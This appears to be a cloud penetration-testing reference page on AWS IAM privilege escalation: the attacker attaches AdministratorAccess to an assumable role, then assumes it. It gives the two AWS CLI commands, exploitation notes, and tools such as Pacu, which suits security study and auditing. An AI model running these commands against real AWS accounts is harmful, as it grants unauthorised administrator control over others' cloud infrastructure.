iam:AttachRolePolicy attaches a managed policy to a role. If you can already assume a role (or pass it to a service), attaching AdministratorAccess to that role turns it into an admin role you then use.
Attach then assume#
aws iam attach-role-policy --role-name <assumable-role> \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws sts assume-role --role-arn arn:aws:iam::<acct>:role/<assumable-role> \
--role-session-name s
Exploitation notes#
- Pair with role assumption: the attach is only useful on a role you can reach, by assuming it or passing it to a service.
- Pre-existing session credentials for the role do not pick up the new policy until a fresh
AssumeRole.
Tools#
- AWS CLI (
iam attach-role-policy,sts assume-role). - Pacu (
iam__privesc_scan).